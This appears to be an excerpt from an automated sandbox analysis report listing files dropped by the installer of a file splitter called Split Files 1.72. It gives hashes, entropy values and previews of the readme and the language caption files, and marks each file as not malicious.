                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
